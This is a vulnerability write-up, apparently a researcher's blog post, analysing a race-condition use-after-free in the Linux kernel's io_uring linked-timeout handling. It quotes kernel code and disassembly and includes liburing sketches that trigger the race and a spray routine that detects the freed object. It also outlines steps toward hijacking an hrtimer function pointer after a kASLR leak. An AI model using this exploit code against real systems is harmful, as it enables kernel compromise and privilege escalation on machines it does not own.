Exploiting a vulnerability in the io_uring
subsystem of the Linux kernel.
Introduction
In this post I will dive into a bug I discovered in the io_uring subsystem, which involves racing the arming of a linked timeout against its cancellation.
But first, why io_uring?
One of the driving factors behind my explo(ration/itation) of this subsystem is Google’s kCTF program. This unique initiative offers substantial rewards, up to $133,337, for successfully exploiting a Linux kernel bug within an nsjail environment. Motivated by the prospect of participating in this program, I began researching previous write-ups and, interestingly, a lot of them targeted io_uring. Also, time was of the essence, as Google was preparing to make changes to the program which would disable io_uring for the most lucrative bounties. With this deadline looming, I embarked on my journey to uncover yet another vulnerability in the io_uring subsystem.
IO_URING
Tons of writeups have already explained (and exploited) various parts of the io_uring subsystem better than I ever could, so please read them:
- CVE-2022-2602: DirtyCred - @kiks
- CVE-2022-2602: DirtyCred Remastered - @LukeGix
- CVE-2022-1786: A Journey To The Dawn - @ky1ebot
- CVE-2022-29582 - @Awarau1 & @pql
- io_register_pbuf_ring @dawnseclab
- CVE-2021-41073: new code, new bugs, and a new exploit technique @junr0n
- CVE-2021–20226: Reference counting bug - @Ga_ryo_
- CVE-2021-41073: Put an io_uring on it - @chompie
In this post I aim to build upon these and specifically CVE-2022-29582, due to the similarities with timeouts.
Within io_uring
there are a lot of different operations one can use (40 in v5.15.89
). I will just explain the relevant parts of the ones I used to trigger and exploit the bug.
Asynchronous Requests
For this post it's just important to know that requests can be forced to execute asynchronously (and thus concurrently with other requests, on an io-wq worker) by setting the IOSQE_ASYNC flag.
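For example, a minimal liburing sketch (the nop is just a placeholder operation, and an initialized struct io_uring ring is assumed):

struct io_uring_sqe *sqe = io_uring_get_sqe(&ring);

io_uring_prep_nop(sqe);
/* Force execution on an io-wq worker instead of the inline submission path. */
sqe->flags |= IOSQE_ASYNC;
io_uring_submit(&ring);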
IORING_OP_TIMEOUT
The IORING_OP_TIMEOUT
operation allows developers to use timeouts. More information can be found in CVE-2022-29582#timeout-operations-ioring_op_timeout.
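From userspace a plain timeout looks roughly like this (a hedged liburing sketch; the duration, user_data value and the initialized ring are placeholders/assumptions):

struct __kernel_timespec ts = { .tv_sec = 10 };
struct io_uring_sqe *sqe = io_uring_get_sqe(&ring);

/* Completes with -ETIME after 10s, or earlier once `count` CQEs have been
 * posted (count == 0 means a pure timeout). */
io_uring_prep_timeout(sqe, &ts, 0, 0);
sqe->user_data = 0x1111; /* later referenced by IORING_OP_TIMEOUT_REMOVE */
io_uring_submit(&ring);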
IORING_OP_LINK_TIMEOUT
The IORING_OP_LINK_TIMEOUT
operation allows developers to add a timeout to the previous request in the chain. This request is first prepped and then armed.
Since an sqe (submission queue entry) can be evaluated in various contexts (asynchronously, or directly from the syscall path), the preparation and arming of such a request may occur in different locations:
static void __io_queue_sqe(struct io_kiocb *req)
__must_hold(&req->ctx->uring_lock)
{
struct io_kiocb *linked_timeout;
int ret;
issue_sqe:
ret = io_issue_sqe(req, IO_URING_F_NONBLOCK|IO_URING_F_COMPLETE_DEFER);
// ...
if (likely(!ret)) {
linked_timeout = io_prep_linked_timeout(req);
if (linked_timeout)
io_queue_linked_timeout(linked_timeout);
} else if (ret == -EAGAIN && !(req->flags & REQ_F_NOWAIT)) {
linked_timeout = io_prep_linked_timeout(req);
switch (io_arm_poll_handler(req)) {
case IO_APOLL_READY:
if (linked_timeout)
io_queue_linked_timeout(linked_timeout);
goto issue_sqe;
// ...
}
if (linked_timeout)
io_queue_linked_timeout(linked_timeout);
}
// ...
}
static void io_wq_submit_work(struct io_wq_work *work)
{
struct io_kiocb *req = container_of(work, struct io_kiocb, work);
struct io_kiocb *timeout;
int ret = 0;
// ...
timeout = io_prep_linked_timeout(req);
if (timeout)
io_queue_linked_timeout(timeout);
// ...
if (!ret) {
do {
ret = io_issue_sqe(req, 0);
// ..
} while (1);
}
// ...
}
static void io_queue_async_work(struct io_kiocb *req, bool *locked)
{
struct io_ring_ctx *ctx = req->ctx;
struct io_kiocb *link = io_prep_linked_timeout(req);
// ...
io_wq_enqueue(tctx->io_wq, &req->work);
if (link)
io_queue_linked_timeout(link);
// ...
}
Notice how all of these functions call io_prep_linked_timeout before calling io_issue_sqe / io_wq_enqueue, except for __io_queue_sqe, which only prepares and queues the linked timeout after io_issue_sqe has returned.
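For reference, this is roughly how a linked timeout is created from userspace (a hedged liburing sketch; the fd, buffer, duration and the initialized ring are placeholders/assumptions):

struct __kernel_timespec ts = { .tv_sec = 1 };
struct io_uring_sqe *sqe;
char buf[64];

/* The "parent" request; IOSQE_IO_LINK makes the next sqe its linked request. */
sqe = io_uring_get_sqe(&ring);
io_uring_prep_read(sqe, fd, buf, sizeof(buf), 0);
sqe->flags |= IOSQE_IO_LINK;

/* The linked timeout: cancels the read if it hasn't completed within 1s. */
sqe = io_uring_get_sqe(&ring);
io_uring_prep_link_timeout(sqe, &ts, 0);

io_uring_submit(&ring);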
Let's take a closer look at the io_prep_linked_timeout function:
static inline struct io_kiocb *io_prep_linked_timeout(struct io_kiocb *req)
{
if (likely(!(req->flags & REQ_F_ARM_LTIMEOUT)))
return NULL;
return __io_prep_linked_timeout(req);
}
static struct io_kiocb *__io_prep_linked_timeout(struct io_kiocb *req)
{
if (WARN_ON_ONCE(!req->link))
return NULL;
req->flags &= ~REQ_F_ARM_LTIMEOUT;
req->flags |= REQ_F_LINK_TIMEOUT;
/* linked timeouts should have two refs once prep'ed */
io_req_set_refcount(req);
__io_req_set_refcount(req->link, 2);
return req->link;
}
It becomes clear that a linked timeout can only be prepped if its parent request has the REQ_F_ARM_LTIMEOUT flag set (ready to be armed); the parent then transitions to the REQ_F_LINK_TIMEOUT flag (indicating the linked timeout has been armed).
Let's take a closer look at the io_queue_linked_timeout function:
static void io_queue_linked_timeout(struct io_kiocb *req)
{
struct io_ring_ctx *ctx = req->ctx;
spin_lock_irq(&ctx->timeout_lock);
/*
* If the back reference is NULL, then our linked request finished
* before we got a chance to setup the timer
*/
if (req->timeout.head) {
struct io_timeout_data *data = req->async_data;
data->timer.function = io_link_timeout_fn;
hrtimer_start(&data->timer, timespec64_to_ktime(data->ts),
data->mode);
list_add_tail(&req->timeout.list, &ctx->ltimeout_list);
}
spin_unlock_irq(&ctx->timeout_lock);
/* drop submission reference */
io_put_req(req);
}
This will start the linked timeout and add it to the ctx->ltimeout_list
list.
IORING_OP_TIMEOUT_REMOVE
This operation allows developers to remove / cancel regular timeouts and update regular and linked timeouts. Updating works as follows:
static int io_timeout_update(struct io_ring_ctx *ctx, __u64 user_data,
struct timespec64 *ts, enum hrtimer_mode mode)
__must_hold(&ctx->timeout_lock)
{
struct io_kiocb *req = io_timeout_extract(ctx, user_data);
struct io_timeout_data *data;
if (IS_ERR(req))
return PTR_ERR(req);
req->timeout.off = 0; /* noseq */
data = req->async_data;
list_add_tail(&req->timeout.list, &ctx->timeout_list);
hrtimer_init(&data->timer, io_timeout_get_clock(data), mode);
data->timer.function = io_timeout_fn;
hrtimer_start(&data->timer, timespec64_to_ktime(*ts), mode);
return 0;
}
static int io_linked_timeout_update(struct io_ring_ctx *ctx, __u64 user_data,
struct timespec64 *ts, enum hrtimer_mode mode)
__must_hold(&ctx->timeout_lock)
{
struct io_timeout_data *io;
struct io_kiocb *req;
bool found = false;
list_for_each_entry(req, &ctx->ltimeout_list, timeout.list) {
found = user_data == req->user_data;
if (found)
break;
}
if (!found)
return -ENOENT;
io = req->async_data;
if (hrtimer_try_to_cancel(&io->timer) == -1)
return -EALREADY;
hrtimer_init(&io->timer, io_timeout_get_clock(io), mode);
io->timer.function = io_link_timeout_fn;
hrtimer_start(&io->timer, timespec64_to_ktime(*ts), mode);
return 0;
}
For linked timeouts it first tries to find the ltimeout in the ctx->ltimeout_list, while io_timeout_extract locates regular timeouts in the ctx->timeout_list. Other than that, the two functions could be used interchangeably if a regular timeout were somehow able to get into the ctx->ltimeout_list.
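From userspace both update paths are reached through IORING_OP_TIMEOUT_REMOVE; a hedged liburing sketch (it assumes liburing's io_uring_prep_timeout_update() ORs IORING_TIMEOUT_UPDATE into the timeout flags, the user_data values are placeholders, and an initialized ring is assumed):

struct __kernel_timespec ts = { .tv_sec = 5 };
struct io_uring_sqe *sqe;

/* Update a regular timeout (handled by io_timeout_update()). */
sqe = io_uring_get_sqe(&ring);
io_uring_prep_timeout_update(sqe, &ts, 0x1111, 0);

/* Update a linked timeout (handled by io_linked_timeout_update(), which
 * searches ctx->ltimeout_list). */
sqe = io_uring_get_sqe(&ring);
io_uring_prep_timeout_update(sqe, &ts, 0x2222, IORING_LINK_TIMEOUT_UPDATE);

io_uring_submit(&ring);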
IORING_OP_POLL_ADD
The IORING_OP_POLL_ADD
operation allows developers to use polling.
IORING_OP_POLL_REMOVE
The IORING_OP_POLL_REMOVE
operation allows developers to remove / update poll requests. It works by first finding the poll request based on the provided user_data (io_poll_find) and then cancelling it by invoking io_req_complete on that poll request, which in turn calls __io_req_complete and io_req_complete_post:
static int io_poll_update(struct io_kiocb *req, unsigned int issue_flags)
{
struct io_ring_ctx *ctx = req->ctx;
struct io_kiocb *preq;
int ret2, ret = 0;
spin_lock(&ctx->completion_lock);
preq = io_poll_find(ctx, req->poll_update.old_user_data, true);
if (!preq || !io_poll_disarm(preq)) {
spin_unlock(&ctx->completion_lock);
ret = preq ? -EALREADY : -ENOENT;
goto out;
}
spin_unlock(&ctx->completion_lock);
// ...
req_set_fail(preq);
io_req_complete(preq, -ECANCELED);
out:
if (ret < 0)
req_set_fail(req);
/* complete update request, we're done with it */
io_req_complete(req, ret);
return 0;
}
static void io_req_complete_post(struct io_kiocb *req, s32 res,
u32 cflags)
{
struct io_ring_ctx *ctx = req->ctx;
spin_lock(&ctx->completion_lock);
__io_fill_cqe(ctx, req->user_data, res, cflags);
/*
* If we're the last reference to this request, add to our locked
* free_list cache.
*/
if (req_ref_put_and_test(req)) {
if (req->flags & (REQ_F_LINK | REQ_F_HARDLINK)) {
if (req->flags & IO_DISARM_MASK)
io_disarm_next(req);
if (req->link) {
io_req_task_queue(req->link);
req->link = NULL;
}
}
io_dismantle_req(req);
io_put_task(req->task, 1);
list_add(&req->inflight_entry, &ctx->locked_free_list);
ctx->locked_free_nr++;
} else {
if (!percpu_ref_tryget(&ctx->refs))
req = NULL;
}
io_commit_cqring(ctx);
spin_unlock(&ctx->completion_lock);
if (req) {
io_cqring_ev_posted(ctx);
percpu_ref_put(&ctx->refs);
}
}
This function completes the current request and posts a new cqe. If it drops the last reference and the request carries link flags, it also calls io_disarm_next:
static bool io_disarm_next(struct io_kiocb *req)
__must_hold(&req->ctx->completion_lock)
{
bool posted = false;
if (req->flags & REQ_F_ARM_LTIMEOUT) { // [1]
struct io_kiocb *link = req->link;
req->flags &= ~REQ_F_ARM_LTIMEOUT;
if (link && link->opcode == IORING_OP_LINK_TIMEOUT) {
io_remove_next_linked(req);
io_fill_cqe_req(link, -ECANCELED, 0);
io_put_req_deferred(link);
posted = true;
}
} else if (req->flags & REQ_F_LINK_TIMEOUT) { // [2]
struct io_ring_ctx *ctx = req->ctx;
spin_lock_irq(&ctx->timeout_lock);
posted = io_kill_linked_timeout(req);
spin_unlock_irq(&ctx->timeout_lock);
}
if (unlikely((req->flags & REQ_F_FAIL) &&
!(req->flags & REQ_F_HARDLINK))) {
posted |= (req->link != NULL);
io_fail_links(req);
}
return posted;
}
Taking the first path [1], the request is checked for the ready-to-be-armed flag. If the flag is set, it is cleared and the linked timeout is completed with -ECANCELED.
The second path [2], on the other hand, handles the case where the linked timeout has already been armed. In that scenario, io_kill_linked_timeout cancels the linked request (ltimeout) accordingly.
Looks good right?
It is important to note that this chain of functions runs synchronously, one call directly after the other, which is different from other cancellation requests, e.g. IORING_OP_TIMEOUT_REMOVE:
static int io_timeout_remove(struct io_kiocb *req, unsigned int issue_flags)
{
struct io_timeout_rem *tr = &req->timeout_rem;
struct io_ring_ctx *ctx = req->ctx;
int ret;
if (!(req->timeout_rem.flags & IORING_TIMEOUT_UPDATE)) {
spin_lock(&ctx->completion_lock);
spin_lock_irq(&ctx->timeout_lock);
ret = io_timeout_cancel(ctx, tr->addr);
spin_unlock_irq(&ctx->timeout_lock);
spin_unlock(&ctx->completion_lock);
}
// ...
}
static int io_timeout_cancel(struct io_ring_ctx *ctx, __u64 user_data)
__must_hold(&ctx->completion_lock)
__must_hold(&ctx->timeout_lock)
{
struct io_kiocb *req = io_timeout_extract(ctx, user_data);
if (IS_ERR(req))
return PTR_ERR(req);
req_set_fail(req);
io_fill_cqe_req(req, -ECANCELED, 0);
io_put_req_deferred(req);
return 0;
}
Which calls io_put_req_deferred
:
static inline void io_put_req_deferred(struct io_kiocb *req)
{
if (req_ref_put_and_test(req)) {
req->io_task_work.func = io_free_req_work;
io_req_task_work_add(req);
}
}
This eventually also calls io_disarm_next, but it is executed as task_work, which introduces some delay.
LinkedPoll
Now, having gained some insight into the various operations, let's dive into what happens when we introduce concurrency.
Recall io_disarm_next:
static bool io_disarm_next(struct io_kiocb *req)
__must_hold(&req->ctx->completion_lock)
{
bool posted = false;
if (req->flags & REQ_F_ARM_LTIMEOUT) { // [1]
struct io_kiocb *link = req->link;
req->flags &= ~REQ_F_ARM_LTIMEOUT;
if (link && link->opcode == IORING_OP_LINK_TIMEOUT) {
io_remove_next_linked(req);
io_fill_cqe_req(link, -ECANCELED, 0);
io_put_req_deferred(link);
posted = true;
}
} else if (req->flags & REQ_F_LINK_TIMEOUT) { // [2]
struct io_ring_ctx *ctx = req->ctx;
spin_lock_irq(&ctx->timeout_lock);
posted = io_kill_linked_timeout(req);
spin_unlock_irq(&ctx->timeout_lock);
}
if (unlikely((req->flags & REQ_F_FAIL) &&
!(req->flags & REQ_F_HARDLINK))) {
posted |= (req->link != NULL);
io_fail_links(req);
}
return posted;
}
and io_prep_linked_timeout:
static inline struct io_kiocb *io_prep_linked_timeout(struct io_kiocb *req)
{
if (likely(!(req->flags & REQ_F_ARM_LTIMEOUT))) // [3]
return NULL;
return __io_prep_linked_timeout(req);
}
static struct io_kiocb *__io_prep_linked_timeout(struct io_kiocb *req)
{
if (WARN_ON_ONCE(!req->link))
return NULL;
req->flags &= ~REQ_F_ARM_LTIMEOUT;
req->flags |= REQ_F_LINK_TIMEOUT;
/* linked timeouts should have two refs once prep'ed */
io_req_set_refcount(req);
__io_req_set_refcount(req->link, 2); // [4]
return req->link;
}
Now, what would happen if we could somehow arm a linked timeout while cancelling it at the same time? In this case we would take the first path in the io_disarm_next function [1] (not yet armed), and we would also pass the check in io_prep_linked_timeout ([3]), after which io_queue_linked_timeout would actually start the timer. From this point on, we would have a timer running while its parent request has already been completed.
The race, read top to bottom, with Thread 1 in io_disarm_next and Thread 2 in io_prep_linked_timeout:

Thread 1 (io_disarm_next)                    Thread 2 (io_prep_linked_timeout)
if (req->flags & REQ_F_ARM_LTIMEOUT) {
                                             if (likely(!(req->flags & REQ_F_ARM_LTIMEOUT)))
req->flags &= ~REQ_F_ARM_LTIMEOUT;
                                             req->flags &= ~REQ_F_ARM_LTIMEOUT;
                                             req->flags |= REQ_F_LINK_TIMEOUT;
                                             io_queue_linked_timeout(timeout)
io_remove_next_linked(req);
...                                          ...
The linked timeout is still being queued despite its parent being disarmed.
But how do we actually cancel a linked timeout while simultaneously arming it?
Introducing IORING_OP_POLL_ADD and IORING_OP_POLL_REMOVE. As seen before, using IORING_OP_POLL_REMOVE to cancel an IORING_OP_POLL_ADD request cancels the request inline (it doesn't involve extra task work). Combined with queueing the poll request via __io_queue_sqe, where the request is first issued and only then the ltimeout is armed, this means that a well-timed asynchronous cancel request can hit the path described earlier.
From now on, I’ll refer to our dangling linked timeout as
ltimeout
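To make this concrete, here is a hedged sketch of one possible submission pattern (not the exact reproducer): the poll removal is forced onto an io-wq worker with IOSQE_ASYNC so it can run concurrently with the inline arming in __io_queue_sqe. The fd, user_data, timing and retry logic are assumptions, and io_uring_prep_poll_remove()'s user_data argument type differs between liburing versions.

#include <liburing.h>
#include <poll.h>

#define TARGET_UDATA 0x1337

/* One attempt at lining up the race; in practice this has to be repeated
 * many times with careful timing. */
static void submit_race_attempt(struct io_uring *ring, int race_fd)
{
    struct __kernel_timespec ts = { .tv_nsec = 1000000 };
    struct io_uring_sqe *sqe;

    /* Async cancel: punted to an io-wq worker, so the inline cancellation
     * path (io_poll_update() -> io_req_complete_post() -> io_disarm_next())
     * can run while the submitting task is still inside __io_queue_sqe()
     * for the poll request below. */
    sqe = io_uring_get_sqe(ring);
    io_uring_prep_poll_remove(sqe, TARGET_UDATA); /* older liburing: void *user_data */
    sqe->flags |= IOSQE_ASYNC;

    /* The poll request, issued inline by __io_queue_sqe()... */
    sqe = io_uring_get_sqe(ring);
    io_uring_prep_poll_add(sqe, race_fd, POLLIN);
    sqe->flags |= IOSQE_IO_LINK;
    sqe->user_data = TARGET_UDATA;

    /* ...with a linked timeout that is only armed after io_issue_sqe()
     * returns -- this is the window the async removal races against. */
    sqe = io_uring_get_sqe(ring);
    io_uring_prep_link_timeout(sqe, &ts, 0);

    io_uring_submit(ring);
}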
However, let’s pause for a moment and take notice of the io_remove_next_linked
function:
static bool io_disarm_next(struct io_kiocb *req)
__must_hold(&req->ctx->completion_lock)
{
bool posted = false;
if (req->flags & REQ_F_ARM_LTIMEOUT) { // [1]
struct io_kiocb *link = req->link;
req->flags &= ~REQ_F_ARM_LTIMEOUT;
if (link && link->opcode == IORING_OP_LINK_TIMEOUT) {
io_remove_next_linked(req); // [5]
// ...
} // ...
} // ...
}
static inline void io_remove_next_linked(struct io_kiocb *req)
{
struct io_kiocb *nxt = req->link;
req->link = nxt->link;
nxt->link = NULL;
}
static struct io_kiocb *__io_prep_linked_timeout(struct io_kiocb *req)
{
if (WARN_ON_ONCE(!req->link))
return NULL;
req->flags &= ~REQ_F_ARM_LTIMEOUT;
req->flags |= REQ_F_LINK_TIMEOUT;
/* linked timeouts should have two refs once prep'ed */
io_req_set_refcount(req);
__io_req_set_refcount(req->link, 2); // [4]
return req->link;
}
In this context req->link is our ltimeout, so this sets req->link = ltimeout->link, which effectively removes the reference to ltimeout. This means that io_prep_linked_timeout could return ltimeout->link if we're unlucky, which is fine because we can ensure it's NULL, but __io_req_set_refcount(req->link, 2); ([4]) is a problem because it would then almost surely cause a NULL pointer dereference. Let's analyse this further and look at how this is all implemented in assembly:
io_disarm_next
:
00008e01: test eax, 0x100000
00008e06: je 0x8e4b
00008e08: mov edx, eax
00008e0a: mov rbp, qword [rdi+0x70]
00008e0e: and edx, 0xffefffff ; [1]
00008e14: mov dword [rdi+0x58], edx
00008e17: test rbp, rbp
00008e1a: je 0x8edc
00008e20: cmp byte [rbp+0x48], 0xf
00008e24: je 0x8f7b
...
00008f7b: mov rax, qword [rbp+0x70]
00008f7f: mov edx, 0xffffff83
00008f84: mov qword [rdi+0x70], rax ; [2]
00008f88: mov rsi, qword [rbp+0x68]
00008f8c: mov qword [rbp+0x70], 0x0
So it takes 8 instructions to set req->link = ltimeout->link
.
__io_queue_sqe
-> __io_prep_linked_timeout
:
00010279: test eax, 0x100000 ; [3]
0001027e: je 0x1024d
00010280: mov rdi, r12
00010283: call __io_prep_linked_timeout
__io_prep_linked_timeout:
00001af0: call __fentry__
00001af5: mov rax, qword [rdi+0x70] ; [4]
00001af9: test rax, rax ; if (WARN_ON_ONCE(!req->link))
00001afc: je 0x1b4d ; return NULL;
00001afe: mov ecx, dword [rdi+0x58]
00001b01: mov edx, ecx
00001b03: and edx, 0xffefffff ; req->flags &= ~REQ_F_ARM_LTIMEOUT;
00001b09: and ecx, 0x80000 ; req->flags |= REQ_F_LINK_TIMEOUT;
00001b0f: je 0x1b3b ; io_req_set_refcount(req);
00001b11: or dh, 0x10
00001b14: mov dword [rdi+0x58], edx
00001b17: mov edx, dword [rax+0x58]
00001b1a: test edx, 0x80000
00001b20: jne 0x1b36
00001b22: or edx, 0x80000
00001b28: mov dword [rax+0x5c], 0x2 ; __io_req_set_refcount(req->link, 2);
00001b2f: mov dword [rax+0x58], edx ; req->flags |= REQ_F_REFCOUNT;
00001b32: mov rax, qword [rdi+0x70] ; return req->link;
00001b36: jmp __x86_return_thunk
__fentry__:
#ifdef CONFIG_DYNAMIC_FTRACE
SYM_FUNC_START(__fentry__)
RET
SYM_FUNC_END(__fentry__)
EXPORT_SYMBOL(__fentry__)
; ...
#endif
In the .config we're given, CONFIG_DYNAMIC_FTRACE=y is set, so __fentry__ is only a RET.
This means we're lucky! The compiler reuses the rax value loaded at the beginning of the function for the !req->link check all the way to the __io_req_set_refcount(req->link, 2); call, and thus the race window becomes a bit more favourable.
Let's assume the worst-case scenario: the test in __io_queue_sqe ([3]) happens at the same time as the flag is cleared in io_disarm_next ([1]). In io_disarm_next there are 8 instructions before it sets req->link = ltimeout->link, while there are only 6 instructions to reach setting rax = req->link ([4]) (and let's hope our CPU does some optimization around the call __fentry__).
Of course we can't just assume this will be fine because 6 < 8 (instruction clock cycles and CPU optimizations matter), but in practice I have never actually seen req->link = ltimeout->link happen before rax = req->link is set.
Exploitation
Triggered?
Knowing how to trigger the bug, the challenge now lies in identifying whether it has actually been triggered. This is crucial because the race window is extremely tight, and it often (depending on the CPU) takes numerous attempts. Moreover, repeatedly redoing the entire exploitation phase, including heap feng shui and other steps, for every attempt would be extremely time-consuming.
So does our free’d linked timeout leave some dirt behind?
Let's take a closer look at the IORING_OP_LINK_TIMEOUT from the previous section. We've seen that the ltimeout is added to the ctx->ltimeout_list; however, it is never actually removed from that list (because, according to io_disarm_next, it was not yet armed). This gives us a way to figure out whether we've triggered the bug.
In short, there is still a reference to the linked timeout in the ctx->ltimeout_list, meaning that we could execute an IORING_OP_TIMEOUT_REMOVE with the LINKED_TIMEOUT flag, which would cancel our free'd ltimeout.
But this is not actually what we want; we want to keep our ltimeout alive. Thankfully, io_uring reuses free'd requests and adds them to a locked_free_list once they are completed, as seen in io_req_complete_post.
This list is later flushed when io_alloc_req is called, which in turn calls io_flush_cached_reqs, which finally calls io_flush_cached_locked_reqs and splices the ctx->locked_free_list into the ctx->submit_state.free_list:
/*
* A request might get retired back into the request caches even before opcode
* handlers and io_issue_sqe() are done with it, e.g. inline completion path.
* Because of that, io_alloc_req() should be called only under ->uring_lock
* and with extra caution to not get a request that is still worked on.
*/
static struct io_kiocb *io_alloc_req(struct io_ring_ctx *ctx)
__must_hold(&ctx->uring_lock)
{
// ...
BUILD_BUG_ON(ARRAY_SIZE(state->reqs) < IO_REQ_ALLOC_BATCH);
if (likely(state->free_reqs || io_flush_cached_reqs(ctx)))
goto got_req;
// ...
got_req:
state->free_reqs--;
return state->reqs[state->free_reqs];
}
/* Returns true IFF there are requests in the cache */
static bool io_flush_cached_reqs(struct io_ring_ctx *ctx)
{
struct io_submit_state *state = &ctx->submit_state;
int nr;
/*
* If we have more than a batch's worth of requests in our IRQ side
* locked cache, grab the lock and move them over to our submission
* side cache.
*/
if (READ_ONCE(ctx->locked_free_nr) > IO_COMPL_BATCH) // IO_COMPL_BATCH == 32
io_flush_cached_locked_reqs(ctx, state);
nr = state->free_reqs;
while (!list_empty(&state->free_list)) {
struct io_kiocb *req = list_first_entry(&state->free_list,
struct io_kiocb, inflight_entry);
list_del(&req->inflight_entry);
state->reqs[nr++] = req;
if (nr == ARRAY_SIZE(state->reqs))
break;
}
state->free_reqs = nr;
return nr != 0;
}
static void io_flush_cached_locked_reqs(struct io_ring_ctx *ctx,
struct io_submit_state *state)
{
spin_lock(&ctx->completion_lock);
list_splice_init(&ctx->locked_free_list, &state->free_list);
ctx->locked_free_nr = 0;
spin_unlock(&ctx->completion_lock);
}
So our ltimeout ends up in the ctx->locked_free_list when it is free'd. To figure out whether the bug has been triggered, we can spray a ton of IORING_OP_TIMEOUT requests and reclaim the ltimeout that is still sitting in the ctx->ltimeout_list as a regular IORING_OP_TIMEOUT, and then add a single IORING_OP_TIMEOUT_REMOVE with the LINKED_TIMEOUT flag.
Here I stumbled on a small difference: I initially compiled the kernel with gcc, while the actual kernel was compiled with clang. With the gcc build it was enough to spray only 64 objects, while for the actual build it took way more.
Then, when the remove request is executed, it will try to find the ltimeout in the ctx->ltimeout_list (at this point it is actually just a regular timeout), and if it succeeds, meaning we've triggered the UAF, it will simply update the regular timeout.
Thankfully, the update functions for the two different timeout operations are very similar and can be called interchangeably, as seen before.
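A hedged sketch of this detection step (the spray count, user_data values and the assumption that liburing's io_uring_prep_timeout_update() ORs in IORING_TIMEOUT_UPDATE are mine; it also assumes the ring is large enough and that no unrelated completions arrive while probing):

#include <liburing.h>

#define SPRAY_UDATA_BASE 0x41410000UL
#define NR_SPRAY 256

static int probe_triggered(struct io_uring *ring)
{
    struct __kernel_timespec long_ts = { .tv_sec = 9999 };
    struct io_uring_sqe *sqe;
    struct io_uring_cqe *cqe;
    int i, hit = -1;

    /* Reclaim the free'd request (sitting in ctx->locked_free_list) with
     * plain timeouts; one of them may reuse the dangling ltimeout, which is
     * still linked into ctx->ltimeout_list. */
    for (i = 0; i < NR_SPRAY; i++) {
        sqe = io_uring_get_sqe(ring);
        io_uring_prep_timeout(sqe, &long_ts, 0, 0);
        sqe->user_data = SPRAY_UDATA_BASE + i;
    }
    io_uring_submit(ring);

    /* Probe: a linked-timeout update only succeeds (res == 0 instead of
     * -ENOENT) if the sprayed timeout ended up in ctx->ltimeout_list,
     * i.e. if the UAF was actually triggered. */
    for (i = 0; i < NR_SPRAY; i++) {
        sqe = io_uring_get_sqe(ring);
        io_uring_prep_timeout_update(sqe, &long_ts, SPRAY_UDATA_BASE + i,
                                     IORING_LINK_TIMEOUT_UPDATE);
        io_uring_submit(ring);
        io_uring_wait_cqe(ring, &cqe);
        if (cqe->res == 0)
            hit = i;
        io_uring_cqe_seen(ring, cqe);
    }
    return hit; /* index of the timeout that reclaimed the ltimeout, or -1 */
}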
Replacing the ltimeout
I hoped to exploit the bug in a similar fashion to CVE-2022-29582; sadly, it took me a very long time to figure out the following:
static int calculate_sizes(struct kmem_cache *s, int forced_order)
{
//...
/*
* Store freelist pointer near middle of object to keep
* it away from the edges of the object to avoid small
* sized over/underflows from neighboring allocations.
*/
s->offset = ALIGN_DOWN(s->object_size / 2, sizeof(void *));
//...
}
$ pahole io_timeout_data ./vmlinux -E 2> /dev/null
struct io_timeout_data {
struct io_kiocb * req; /* 0 8 */
struct hrtimer {
struct timerqueue_node {
struct rb_node {
long unsigned int __rb_parent_color; /* 8 8 */
struct rb_node * rb_right; /* 16 8 */
struct rb_node * rb_left; /* 24 8 */
} node; /* 8 24 */
/* typedef ktime_t -> s64 -> __s64 */ long long int expires; /* 32 8 */
} node; /* 8 32 */
/* typedef ktime_t -> s64 -> __s64 */ long long int _softexpires; /* 40 8 */
enum hrtimer_restart (*function)(struct hrtimer *); /* 48 8 */
struct hrtimer_clock_base * base; /* 56 8 */
/* --- cacheline 1 boundary (64 bytes) --- */
/* typedef u8 -> __u8 */ unsigned char state; /* 64 1 */
/* typedef u8 -> __u8 */ unsigned char is_rel; /* 65 1 */
/* typedef u8 -> __u8 */ unsigned char is_soft; /* 66 1 */
/* typedef u8 -> __u8 */ unsigned char is_hard; /* 67 1 */
} timer; /* 8 64 */
/* XXX last struct has 4 bytes of padding */
struct timespec64 {
/* typedef time64_t -> __s64 */ long long int tv_sec; /* 72 8 */
long int tv_nsec; /* 80 8 */
} ts; /* 72 16 */
enum hrtimer_mode mode; /* 88 4 */
/* typedef u32 -> __u32 */ unsigned int flags; /* 92 4 */
/* size: 96, cachelines: 2, members: 5 */
/* paddings: 1, sum paddings: 4 */
/* last cacheline: 32 bytes */
};
So after kfree is called on our io_timeout_data object, the freelist pointer is placed at the exact same offset (96 / 2 = 48) as the timer's function pointer (enum hrtimer_restart (*function)(struct hrtimer *)), and therefore there is no way to trigger io_link_timeout_fn this way.
kASLR
With the above idea failing, a new idea is to control the heap such that the previously free'd request->async_data lies under our control. The goal is to control almost a full kmalloc-96 object, because the rbtree properties lie in the first few bytes of the object. Secondly, we'd need a kASLR leak to find a function to call.
Thankfully, there's no need to overcomplicate things, because there exists a full kASLR leak up until ~v6.2, called entrybleed, more details here. Now, when the timer is successfully reallocated, it's possible to call anything once, where the first parameter is a reference to the timer itself and the initial bytes are beyond our control (due to timer constraints). Sadly, I could not find any gadgets that could simply kick off a full ROP chain.
Dirty File
Before going further, let's take a look at how our arbitrary function is actually called:
static void __run_hrtimer(struct hrtimer_cpu_base *cpu_base,
struct hrtimer_clock_base *base,
struct hrtimer *timer, ktime_t *now,
unsigned long flags) __must_hold(&cpu_base->lock)
{
//...
__remove_hrtimer(timer, base, HRTIMER_STATE_INACTIVE, 0);
fn = timer->function;
//...
restart = fn(timer);
//...
/*
* Note: We clear the running state after enqueue_hrtimer and
* we do not reprogram the event hardware. Happens either in
* hrtimer_start_range_ns() or in hrtimer_interrupt()
*
* Note: Because we dropped the cpu_base->lock above,
* hrtimer_start_range_ns() can have popped in and enqueued the timer
* for us already.
*/
if (restart != HRTIMER_NORESTART &&
!(timer->state & HRTIMER_STATE_ENQUEUED))
enqueue_hrtimer(timer, base, HRTIMER_MODE_ABS);
//...
}
static void __remove_hrtimer(struct hrtimer *timer,
struct hrtimer_clock_base *base,
u8 newstate, int reprogram)
{
// ...
WRITE_ONCE(timer->state, newstate);
if (!(state & HRTIMER_STATE_ENQUEUED))
return;
if (!timerqueue_del(&base->active, &timer->node))
cpu_base->active_bases &= ~(1 << base->index);
// ...
}
The __run_hrtimer function first removes our timer from the rbtree by calling __remove_hrtimer, which only performs the removal if the HRTIMER_STATE_ENQUEUED flag is set and then overwrites timer->state with HRTIMER_STATE_INACTIVE. Removing the timer is essential to avoid the same function being called over and over again, which is very bad, so our fake state needs to have the HRTIMER_STATE_ENQUEUED flag set.
